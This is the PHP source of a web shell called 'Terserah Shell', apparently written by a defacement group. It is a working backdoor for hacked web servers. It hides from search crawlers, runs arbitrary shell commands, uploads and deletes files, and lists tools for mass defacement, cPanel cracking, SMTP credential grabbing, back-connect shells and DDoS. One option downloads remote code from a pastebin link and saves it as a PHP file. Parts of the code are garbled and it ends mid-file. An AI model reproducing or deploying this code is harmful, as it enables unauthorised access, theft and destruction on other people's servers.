JKHTML

<?
php
$auth_pass = "d10d6b075de8234f2d33d8246aba5800";
session_start();
error_reporting(0);
set_time_limit(0);
@set_magic_quotes_runtime(0);
@clearstatcache();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$color = "#00ff00";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'UTF-8';
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL",
"facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo!
Slurp", "YahooSeeker", "bingbot");
if(preg_match('/' . implode('|', $userAgents) . '/i',
$_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
function login_shell() {
?>
<html>
<head>
<title>N45HT</title>
<link href='http://i.imgur.com/7d5rIQm.png' rel='icon' type='image/x-icon'/>
<style type="text/css">
html {
background:#191919;
-webkit-background-size: cover;
-moz-background-size: cover;
-o-background-size: cover;
background-size: cover;
}
html,body{margin:0;padding:0;height:100%;font:10px Arial;}
#wrapper{min-height:100%;position:relative;}
#header{background:#f0f0f0;padding:5px;height:50px;color:#3000ff;}
#body{padding-bottom:40px;padding-left:10px;}
#footer{background:#f0f0f0;position:absolute;bottom:0;width:100%;
text-align:center;color:#408080;}
header {
color: ;
margin: 10px auto;
}
</style>
</head>
<center>
<font face="monospace" size='3' color='lavender'><br>
<header>
<pre>
</pre>
</header>
<br><br><br><br><br><br><br><br>
<fieldset>
<label for="login">Username</label>
<form method="post">
<input type="text" name="id" value="N45HT">
</form>
Password
<input type="password" name="pass"> <br><br>
<input type="submit" value="Login">
</fieldset>
</form>
<style>
</style>
</head>
<body>
</font>
</body>
</head>
<table border="0" cellspacing="1" cellpadding="4" class="tborder"><tr><td
class="thead"><strong></strong></td></tr><tr><td
class="trow1"></a></td></tr></table><br />
<table border="0" cellspacing="1" cellpadding="4" class="tborder">
<tbody><tr>
<?php
exit;
}
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) ==
$auth_pass) ) )
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
else
login_shell();
if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
@ob_clean();
$file = $_GET['file'];
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file).'"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($file));
readfile($file);
exit;
}
?>
<html>
<head>
<title>Terserah Shell</title>
<meta name='author' content='Shell From N45HT'>
<meta charset="UTF-8">
<link href='http://i.imgur.com/7d5rIQm.png' rel='icon' type='image/x-icon'/>
<style type='text/css'>
@import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);
html {
background: #000000;
color: #ffffff;
font-family: 'Share Tech Mono';
font-size: 12px;
width: 100%;
}
li {
display: inline;
margin: 1px;
padding: 1px;
}
#menu{
background:#111111;
margin:9px 3px 4px 2px;
}
#menu a{
padding:4px 19px;
margin:0;
background:#222222;
text-decoration:none;
letter-spacing:2px;
-moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px;
border-radius: 5px;
}
#menu a:hover{
background:#191919;
border-bottom:1px solid #333333;
border-top:1px solid #333333;
}
.explore tr:hover{background:#181818}
table tr:first-child{
text-align: center;
color: white;
}
table, th, td {
border-collapse:collapse;
font-family: Tahoma, Geneva, sans-serif;
background: transparent;
font-size: 13px;
}
.table_home, .th_home, .td_home {
border: 1px solid #191919;
}
th {
padding: 10px;
}
a {
color: #ffffff;
text-decoration: none;
}
a:hover {
color: blue;
text-decoration: underline;
}
b {
color: blue;
}
input[type=text], input[type=password],input[type=submit] {
color: #ffffff;
border: 1px solid #ffffff;
margin: 5px auto;
padding-left: 5px;
font-size: 13px;
}
input[type=submit] {
color: #ffffff;
margin: 5px auto;
padding-left: 5px;
font-size: 13px;
cursor:pointer;
}
textarea {
width: 100%;
height: 400px;
padding-left: 5px;
margin: 10px auto;
resize: none;
color: #ffffff;
font-size: 13px;
}
select {
width: 152px;
color: blue;
margin: 5px auto;
padding-left: 5px;
font-size: 13px;
}
option:hover {
background: blue;
color: #000000;
}
.mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000;
padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px
white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px
#ff0000;}
.cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color:
#ff0000;font-size:25px;text-shadow: 5px 5px 5px black;}
.infoweb {
border-right: 1px solid #00FFFF;
}
</style>
</head>
<?php
function w($dir,$perm) {
if(!is_writable($dir)) {
return "<font color=red>".$perm."</font>";
} else {
return "<font color=blue>".$perm."</font>";
}
}
function r($dir,$perm) {
if(!is_readable($dir)) {
return "<font color=red>".$perm."</font>";
} else {
return "<font color=blue>".$perm."</font>";
}
}
function exe($cmd) {
if(function_exists('system')) {
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('exec')) {
@exec($cmd,$results);
$buff = "";
foreach($results as $result) {
$buff .= $result;
} return $buff;
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('shell_exec')) {
$buff = @shell_exec($cmd);
return $buff;
}
}
function perms($file){
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function hdd($s) {
if($s >= 1073741824)
return sprintf('%1.2f',$s / 1073741824 ).' GB';
elseif($s >= 1048576)
return sprintf('%1.2f',$s / 1048576 ) .' MB';
elseif($s >= 1024)
return sprintf('%1.2f',$s / 1024 ) .' KB';
else
return $s .' B';
}
function ambilKata($param, $kata1, $kata2){
if(strpos($param, $kata1) === FALSE) return FALSE;
if(strpos($param, $kata2) === FALSE) return FALSE;
$start = strpos($param, $kata1) + strlen($kata1);
$end = strpos($param, $kata2, $start);
$return = substr($param, $start, $end - $start);
return $return;
}
function getsource($url) {
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
$content = curl_exec($curl);
curl_close($curl);
return $content;
}
function bing($dork) {
$npage = 1;
$npages = 30000;
$allLinks = array();
$lll = array();
while($npage <= $npages) {
$x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
if($x) {
preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
$npage = $npage + 10;
if (preg_match("(first=" . $npage . "&)siU", $x, $linksuiv) == 0)
break;
} else break;
}
$URLs = array();
foreach($allLinks as $url){
$exp = explode("/", $url);
$URLs[] = $exp[2];
}
$array = array_filter($URLs);
$array = array_unique($array);
$sss = count(array_unique($array));
foreach($array as $domain) {
echo $domain."\n";
}
}
function reverse($url) {
$ch = curl_init("http://domains.yougetsignal.com/domains.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_POST, 1);
$resp = curl_exec($ch);
$resp = str_replace("[","", str_replace("]","", str_replace("\"\"","",
str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","",
str_replace(", ",",", str_replace(", ",",", str_replace("'","",
str_replace("'","", str_replace(":",",", str_replace('"','',
$resp ) ) ) ) ) ) ) ) ) ))));
$array = explode(",,", $resp);
unset($array[0]);
foreach($array as $lnk) {
$lnk = "http://$lnk";
$lnk = str_replace(",", "", $lnk);
echo $lnk."\n";
ob_flush();
flush();
}
curl_close($ch);
}
if(get_magic_quotes_gpc()) {
function idx_ss($array) {
return is_array($array) ? array_map('idx_ss', $array) :
stripslashes($array);
}
$_POST = idx_ss($_POST);
$_COOKIE = idx_ss($_COOKIE);
}
if(isset($_GET['dir'])) {
$dir = $_GET['dir'];
chdir($dir);
} else {
$dir = getcwd();
}
$kernel = php_uname();
$ip = gethostbyname($_SERVER['HTTP_HOST']);
$dir = str_replace("\\","/",$dir);
$scdir = explode("/", $dir);
$freespace = hdd(disk_free_space("/"));
$total = hdd(disk_total_space("/"));
$used = $total - $freespace;
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" :
"<font color=red>OFF</font>";
$ds = @ini_get("disable_functions");
$mysql = (function_exists('mysql_connect')) ? "<font color=blue>ON</font>" : "<font
color=red>OFF</font>";
$curl = (function_exists('curl_version')) ? "<font color=blue>ON</font>" : "<font
$wget = (exe('wget --help')) ? "<font color=blue>ON</font>" : "<font
$perl = (exe('perl --help')) ? "<font color=blue>ON</font>" : "<font
$python = (exe('python --help')) ? "<font color=blue>ON</font>" : "<font
$show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font
color=blue>NONE</font>";
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
echo '<center><div id="menu">';

echo "<BR>";
echo "<center><font size='6px' color='lavender'>Terserah Shell >_<</font>";
echo "<br>";
echo "<p>";
echo "<li> <a href='?'>Home</a> </li>";

echo "<a style='color: blue;' href='?dir=$dir&do=infosys'>Info Website</a> </li>";
echo "<li> <a href='?dir=$dir&do=upload'>Upload</a> </li>";
echo "<li> <a href='?dir=$dir&do=cmd'>Command</a> </li>";
echo "<li> <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> </li>";
echo "<li> <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> </li>";
echo "<li> <a href='?dir=$dir&do=config'>Config</a> </li>";
echo "<li> <a href='?dir=$dir&do=jumping'>Jumping</a> </li>";
echo "<li> <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> </li>";
echo "<li> <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> </li>";
echo "<br><br><li> <a href='?dir=$dir&do=fake_root'>Fake Root</a> </li>";
echo "<li> <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> </li>";
echo "<li> <a href='?dir=$dir&do=auto_wp'>Auto Edit Title</a> </li>";
echo "<li> <a href='?dir=$dir&do=zoneh'>Zone-H</a> </li>";
echo "<li> <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> </li>";
echo "<li> <a href='?dir=$dir&do=cpftp_auto'>CFTP Auto Deface</a> </li>";
echo "<li> <a href='?dir=$dir&do=krdp_shell'>KRDP Shell</a> </li>";
echo "<li> <a href='?dir=$dir&do=network'>network</a> </li>";
echo "<li> <a href='?dir=$dir&do=about'>about</a> </li>";
echo "<br><br><li> <a href='?dir=$dir&do=adminer'>Adminer</a> </li>";
echo "<li> <a href='?dir=$dir&do=tool'>Tool</a>";
echo "<li> <a href='?dir=$dir&do=admf'>Admin Finder</a> </li>";
echo "<li> <a href='?dir=$dir&do=symlink'>symlink</a> </li>";
echo "<li> <a href='?dir=$dir&do=autoklik'>Priv Auto Deface From N45HT</a> </li>";
echo "<li> <a href='?dir=$dir&do=whois'>Whois</a> </li>";
echo "<li> <a href='?dir=$dir&do=cgi'>CGI Telnet</a> </li>";
echo "<li> <a href='?dir=$dir&do=csrf'>CSRF Online</a> </li>";
echo "<br><br><li> <a href='?dir=$dir&do=ddos'>DDos</a> </li>";
echo "<li> <a href='?dir=$dir&do=shellscanner'>Shell Scanner</a> </li>";
echo "<li> <a href='?dir=$dir&do=endeco'>Encode Decode</a> </li>";
echo "<li> <a href='?xp=bypassserver'>Full bypass</a> </li>";
echo "<li> <a href='?dir=$dir&do=defacerid'>DefacerID</a> </li>";
echo "<li> <a href='?dir=$dir&do=bconnet'>Back Connect</a> </li>";
echo "<li> <a style='color: red;' href='?logout=true'>Logout</a> </li>";
echo "<br>";
echo "<br>";
echo "<BR>";
echo "<hr>";
echo "<p>";
echo "Current DIR: ";
foreach($scdir as $c_dir => $cdir) {
echo "<a href='?dir=";
for($i = 0; $i <= $c_dir; $i++) {
echo $scdir[$i];
if($i != $c_dir) {
echo "/";
}
}
echo "'>$cdir</a>/";
}
echo " [ ".w($dir, perms($dir))." ]";
echo "<hr>";
echo "</ul>";
echo "</div>";
if($_GET['logout'] == true) {
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
echo "<script>window.location='?';</script>";
} elseif($_GET['do'] == 'upload') {
echo "<center>";
if($_POST['upload']) {
if($_POST['tipe_upload'] == 'biasa') {
if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']
['name']."")) {
$act = "<font color=blue>Uploaded!</font> at <i><b>$dir/".
$_FILES['ix_file']['name']."</b></i>";
} else {
$act = "<font color=red>failed to upload file</font>";
}
} else {
$root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
$web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
$act = "<font color=blue>Uploaded!</font> at <i><b>$root ->
</b></i><a href='http://$web' target='_blank'>$web</a>";
} else {
}
} else {
}
}
}
echo "Upload File:
<form method='post' enctype='multipart/form-data'>
<input type='radio' name='tipe_upload' value='biasa' checked>Biasa
[ ".w($dir,"Writeable")." ]
<input type='radio' name='tipe_upload' value='home_root'>home_root
[ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
<input type='file' name='ix_file'>
<input type='submit' value='upload' name='upload'>
</form>";
echo $act;
echo "</center>";
}
function parah($pastebin, $nama_file){
$usa = file_get_contents("$pastebin");
$frr = fopen("$nama_file", 'w');
fwrite($frr, $usa);
}
$xp = @$_GET['xp'];
if($xp == "bypassserver"){
$config = parah("http://pastebin.com/raw/ATSD5myG", "bypass.php");
echo '<center><font color =red><a href="bypass.php" target="_blank">Clik
Here To Switch Bypass</a><br></font></center>';
} elseif($_GET['do'] == 'whois') {
@set_time_limit(0);
@error_reporting(0);
function sws_domain_info($site)
{
$getip = @file_get_contents("http://networktools.nl/whois/$site");
flush();
$ip = @findit($getip,'<pre>','</pre>');
return $ip;
flush();
}
function sws_net_info($site)
{
$getip = @file_get_contents("http://networktools.nl/asinfo/$site");
return $ip;
flush();
}
function sws_site_ser($site)
{
$getip = @file_get_contents("http://networktools.nl/reverseip/$site");
return $ip;
flush();
}
function sws_sup_dom($site)
{
$getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-
tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains");
$ip = @findit($getip,'<strong>Nameservers found:</strong>','<script
type="text/javascript">');
return $ip;
flush();
}
function sws_port_scan($ip)
{
$list_post = array('80','21','22','2082','25','53','110','443','143');
foreach ($list_post as $o_port)
{
$connect = @fsockopen($ip,$o_port,$errno,$errstr,5);
if($connect)
{
echo ' $ip : $o_port ??? <u style="color: blue">Open</u> <br /><br />';
flush();
}
}
}
function findit($mytext,$starttag,$endtag) {
$posLeft = @stripos($mytext,$starttag)+strlen($starttag);
$posRight = @stripos($mytext,$endtag,$posLeft+1);
return @substr($mytext,$posLeft,$posRight-$posLeft);
flush();
}
echo '<br><br><center>';
echo '
<br />
<div class="sc"><form method="post"><table>
<tr><th colspan="5" style="border: 2px blue dotted;">Whois Site</th></tr>
<tr><td>Site to scan </td><td>:</td><td><input type="text" name="site"
size="50" style="color:Lavender;" class="inputz" value="site.com" /> � <input
class="inputzbut" type="submit" style="color:Lavender;background-color:#000000"
name="scan" value="Scan !" /></td></tr>
</table></form></div>';
if(isset($_POST['scan']))
{
$site = @htmlentities($_POST['site']);
if (empty($site)){die('<br /><br /> Not add IP .. !');}
$ip_port = @gethostbyname($site);
echo "
<br /><div class='sc2'>Scanning [ $site ip $ip_port ] ... </div>
<div class='tit'> <br /><br />|-------------- Port Server ------------------|
<br /></div>
<div class='ru'> <br /><br /><pre>
";
echo "".sws_port_scan($ip_port)." </pre></div> ";
flush();
echo '<div class="tit"><br /><br />|-------------- Domain Info
------------------| <br /> </div>
<div class="ru">
<pre>".sws_domain_info($site)."</pre></div>';
flush();
echo '
<div class="tit"> <br /><br />|-------------- Network Info ------------------|
<br /></div>
<div class="ru">
<pre>".sws_net_info($site)."</pre> </div>';
flush();
echo '<div class="tit"> <br /><br />|-------------- subdomains Server
------------------| <br /></div>
<div class="ru">
<pre>".sws_sup_dom($site)."</pre> </div>';
flush();
echo '<div class="tit"> <br /><br />|-------------- Site Server
------------------| <br /></div>
<div class="ru">
<pre>".sws_site_ser($site)."</pre> </div>
<div class="tit"> <br /><br />|-------------- END ------------------| <br
/></div>';
flush();
}
echo '</center>';
} elseif($_GET['do'] == 'whois') {
?>
<body >
<center>
<br>
<form method="post"><br>
<textarea class='inputz' cols=30 rows=5 name="mbutt"
style="background:transparent;color:blue;"></textarea><br><br>
<select class='inputz' size="1" name="ope" style="background:red;color:blue;">
<option style='background:transparent;color:blue;'><center>[#] Encryption
[#]</option>
<option value="urlencode" style='background:transparent;color:blue;'>url</option>
<option value="base64" style='background:transparent;color:blue;'>Base64</option>
<option value="ur" style='background:transparent;color:blue;'>convert_uu</option>
<option value="json" style='background:transparent;color:blue;'>json</option>
<option value="gzinflates" style='background:transparent;color:blue;'>gzinflate -
base64</option>
<option value="str2" style='background:transparent;color:blue;'>str_rot13 -
base64</option>
<option value="gzinflate" style='background:transparent;color:blue;'>str_rot13 -
gzinflate - base64</option>
<option value="gzinflater" style='background:transparent;color:blue;'>gzinflate -
str_rot13 - base64</option>
<option value="gzinflatex" style='background:transparent;color:blue;'>gzinflate -
str_rot13 - gzinflate - base64</option>
<option value="gzinflatew" style='background:transparent;color:blue;'>str_rot13 -
convert_uu - url - gzinflate - str_rot13 - base64 - convert_uu - gzinflate - url -
str_rot13 - gzinflate - base64</option>
<option value="str" style='background:transparent;color:blue;'>str_rot13 -
gzinflate - str_rot13 - base64</option>
<option value="url" style='background:transparent;color:blue;'>base64 - gzinflate -
str_rot13 - convert_uu - gzinflate - base64</option>
<option value="hexencode" style='background:transparent;color:blue;'>Hex
Encode/Decode</option>
<option value="md5" style='background:transparent;color:blue;'><center>MD5
Hash</option>
<option value="sha1" style='background:transparent;color:blue;'>SHA1 Hash</option>
<option value="str_rot13" style='background:transparent;color:blue;'>ROT13
Hash</option>
<option value="strlen" style='background:transparent;color:blue;'>strlen</option>
<option value="xxx" style='background:transparent;color:blue;'>unescape</option>
<option value="bbb" style='background:transparent;color:blue;'>charAt</option>
<option value="aaa" style='background:transparent;color:blue;'>chr - bin2hex -
substr</option>
<option value="www" style='background:transparent;color:blue;'>chr</option>
<option value="sss"
style='background:transparent;color:blue;'>htmlspecialchars</option>
<option value="eee"
style='background:transparent;color:blue;'>escape</option></select><br><input
class='inputzbut' type='submit' name='submit' value='Encode'
style="background:transparent;color:blue;">
<input class='inputzbut' type='submit' name='crack' value='Decode'
style="background:transparent;color:blue;"><br>
</select>�
</form>
<?php
$submit = $_POST['submit'];
if (isset($submit)){
$op = $_POST["ope"];
switch ($op) {case 'base64': $codi=base64_encode($text);
break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
break;case 'json' : $codi=json_encode(utf8_encode($text));
break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
break;case 'gzinflatex' :
$codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
break;case 'gzinflatew' :
$codi=base64_encode(gzdeflate(str_rot13(rawurlencode(gzdeflate(convert_uuencode(bas
e64_encode(str_rot13(gzdeflate(convert_uuencode(rawurldecode(str_rot13($text)))))))
)))));
break;case 'gzinflates' : $codi=base64_encode(gzdeflate($text));
break;case 'str2' : $codi=base64_encode(str_rot13($text));
break;case 'urlencode' : $codi=rawurlencode($text);
break;case 'hexencode' : $codi=bin2hex($text);
break;case 'md5' : $codi=md5($text);
break;case 'ur' : $codi=convert_uuencode($text);
break;case 'str_rot13' : $codi=str_rot13($text);
break;case 'sha1' : $codi=sha1($text);
break;case 'strlen' : $codi=strlen($text);
break;case 'xxx' : $codi=strlen(bin2hex($text));
break;case 'bbb' : $codi=htmlentities(utf8_decode($text));
break;case 'aaa' : $codi=chr(bin2hex(substr($text)));
break;case 'www' : $codi=chr($text);
break;case 'sss' : $codi=htmlspecialchars($text);
break;case 'eee' : $codi=addslashes($text);
break;case 'url' :
$codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($t
ext))))));
break;default:break;}}
$submit = $_POST['crack'];
switch ($op) {case 'base64': $codi=base64_decode($text);
break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
break;case 'json' : $codi=utf8_dencode(json_dencode($text));
break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
$codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
$codi=str_rot13(rawurldecode(convert_uudecode(gzinflate(str_rot13(base64_decode(con
vert_uudecode(gzinflate(rawurldecode(str_rot13(gzinflate(base64_decode($text)))))))
)))));
break;case 'gzinflates' : $codi=gzinflate(base64_decode($text));
break;case 'str2' : $codi=str_rot13(base64_decode($text));
break;case 'urlencode' : $codi=rawurldecode($text);
break;case 'hexencode' : $codi=quoted_printable_decode($text);
break;case 'ur' : $codi=convert_uudecode($text);
break;case 'url' :
$codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($
text)))))));
$html = htmlentities(stripslashes($codi));
echo "<from><center><h3><font size=4 face=chiller color=blue>LugiX SHell
Code</h3></center><textarea cols=70 rows=20 style='onfocus();font-
weight:bold;color:red;background-image: transparent;opacity:0.40;background-
size:100%;background-repeat: no-repeat;' class='inputz' readonly>".
$html."</textarea><BR/><BR/></center></from>";
?>
<footer style="text-shadow: 0 0 6px #FF0000, 0 0 5px #FF0000, 0 0 5px #FF0000;
position:fixed; left:1px; right:0px; top:0px; border-bottom: 1px solid red ;">
<center><b><font face="Quicksand" color="black" size="3" style="text-shadow: 0 0
5px #2f2b2b, 0 0 10px #2f2b2b, 0 0 20px #2f2b2b, 0 0 45px #2f2b2b, 0 0 40px
#2f2b2b;">
<font face="Agency FB" color="red" size="4" style="text-shadow: 0 0 6px black, 0 0
5px black, 0 0 5px black;"></footer>
<?php
} elseif($_GET['do'] == 'shellscanner') {
?>
<script language="JavaScript" type="text/JavaScript">

</script>

</style>
#patch {position:absolute; height:1; width:1px; top:0; left:0;}
</style>
</head>
<body>
<center>
<center><font color="gold" size="14" face="arial">Backdoor

Scanner</font></center><br>
<?php
if(isset($_REQUEST['edit']) && $_REQUEST['edit']=='file'){
if(isset($_POST['yes'])){
$filename = $_GET['file'];
echo "<br><br><br><font color=red size=3><b><center>".$filename."
deleted...</b></font><br><br><br><br><br><br><br>";
unlink($filename);
echo "<META HTTP-EQUIV=Refresh CONTENT=\"2;
URL=javascript:window.close();\">";
}else{
if($_POST['update']) {
$filename = $_POST['file'];
if(is_writable($filename)) {
$handle = fopen($filename, "w+");
$isi=$_POST['content'];
fwrite($handle, stripslashes($isi));
fclose($handle);
$stat= "<center><strong>edited successfully<br>";
} else {
$stat= "<center><font color=red><strong>Error! File may not be
writable.</font></center>";
}
}
if($_POST['close']) {
echo "<META HTTP-EQUIV=Refresh CONTENT=\"0;
URL=javascript:window.close();\">";
}
$filename = $_GET['file'];
if (file_exists($filename)){
$vuln = $_GET['bug'];
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
?>
<center>
<table>
<tr><td align="left" class="me"><strong><?=$filename?>��>> Contains :�<?
=$vuln?></strong></td></tr>
<tr><td class="me">
<form method="post" action="">
<input type="hidden" name="file" value="<?=$filename?>">
<textarea name="content" cols="80" rows="15"><?
=htmlspecialchars($contents)?></textarea><br>
</td></tr>
<tr><td align="center" class="me">
<?php
if($_POST['delete']) {
echo "Are you sure to delete ".$filename." ?";
?>
<tr><td align="center" class="me">
<input type="submit" name="yes" value=" Y E S ">
<input type="submit" name="no" value=" N O ">
</td></tr>
<?php
}else{
echo $stat;
?>
</td></tr>
<tr><td align="right" class="me">
<input type="submit" name="close" value=" C l o s e ">
<input type="submit" name="delete" value=" D e l e t e ">
<input type="submit" name="update" value=" S a v e ">
</td></tr>
<?php
}
fclose($handle);
?>
</table>
</form>
<?php
}else{
echo "<br><br><br><font color=red size=3><b><center>".$filename." not
exist...</b></font><br><br><br><br><br><br><br>";
echo "<META HTTP-EQUIV=Refresh CONTENT=\"4; URL=javascript:window.close();\">";
}
?>
</center>
<?php
}
}elseif(isset($_POST['Submit'])){
$ceks =
array('base64_decode','system','passthru','popen','exec','shell_exec','eval','move_
uploaded_file');
foreach($ceks as $ceker){
if($_POST[$ceker]<>""){
$six.=$_POST[$ceker].".";
}
}
$cek = explode('.', $six);
function ListFiles($dir) {
if($dh = opendir($dir)) {
$files = Array();
$inner_files = Array();
while($file = readdir($dh)) {
if($file != "." && $file != "..") {
if(is_dir($dir . "/" . $file)) {
$inner_files = ListFiles($dir . "/" . $file);
if(is_array($inner_files)) $files = array_merge($files,
$inner_files);
} else {
array_push($files, $dir . "/" . $file);
}
}
}
closedir($dh);
return $files;
}
}
?>
<center>
<table border="0" width="90%" cellpadding="5">
<tr>
<td align="right" width="30"><b>No</b></td>
<td align="center" width="105"><b> T y p e </b></td>
<td align="center"><b> F i l e��L o c a t i o n </b></td>
<td align="center" width="150"><b> L a s t��E d i t </b></td>
<td align="right" width="80"><b>F i l e��S i z e</b></td>
</tr><br>
<?php
$target=$_SERVER['DOCUMENT_ROOT'];
foreach (ListFiles($target) as $key=>$file){
$nFile = substr($file, -4, 4);
if($nFile == ".php"){
if($file==$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF']){
}else{
$ops = @file_get_contents($file);
$op=strtolower($ops);
$arr = array('c99_buff_prepare' => 'c 9 9',
'abcr57' => 'r 5 7');
$sis=0;
if($op)
$size=filesize($file);
$last=date("M-d-Y H:i", $last_modified);

foreach($arr as $key => $val) {
if(@preg_match("/$key/", $op)) {
$sis=1;
$i++;
?>
<tr style ="background-color: Your background Color;"
onmouseover="mover(this)" onmouseout="mout(this)">
<td align="right"><font color="red"><blink><?=$i?
></blink></font></td>
<td align="center"><font color="red"><blink><?=$val?
></blink></font></td>
<td align="left"><blink>
<a href="#" class="abunai" onclick="MM_openBrWindow('?
edit=file&file=<?=$file?>&bug=<?=$val?>','File
view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?
></a>
</blink></td>
<td align="center"><font color="red"><blink><?=$last?>
GMT+9</blink></font></td>
<td align="right"><font color="red"><blink><?=$size?>
byte</blink></font></td>
<script language="javascript">
var bgcolor = "transparent";
var change_color = "#444444"
function mover(aa) {
aa.style.backgroundColor = change_color;
}
function mout(aa) {
aa.style.backgroundColor = bgcolor;
}
</script>
</tr>
<?php
}
}
if($sis<>"1"){
if((@preg_match("/system$(.*?)$/", $op))&&(@preg_match("/<pre>/",
$op))&&(@preg_match("/empty$(.*?)$/", $op))) {
$sis="2";
$i++;
$val="hidden shell";
?>
<td align="right"><font color="blue"><?=$i?></font></td>
<td align="center"><font color="blue"><?=$val?></font></td>
<td align="left">
<a href="#" class="xxx" onclick="MM_openBrWindow('?
edit=file&file=<?=$file?>&bug=<?=$val?>','File
></a>
</td>
<td align="center"><font color="blue"><?=$last?>
GMT+9</font></td>
<td align="right"><font color="blue"><?=$size?>
byte</font></td>
}
function mout(aa) {
}
</script>
</tr>
<?php
}
}
if($sis=="0"){
foreach($cek as $bugs) {
if ($bugs<>""){
if(@preg_match("/$bugs$(.*?)$/", $op)) {
$i++;
?>
<td align="right"><?=$i?></td>
<td align="center"><?=$bugs?></td>
<td align="left">
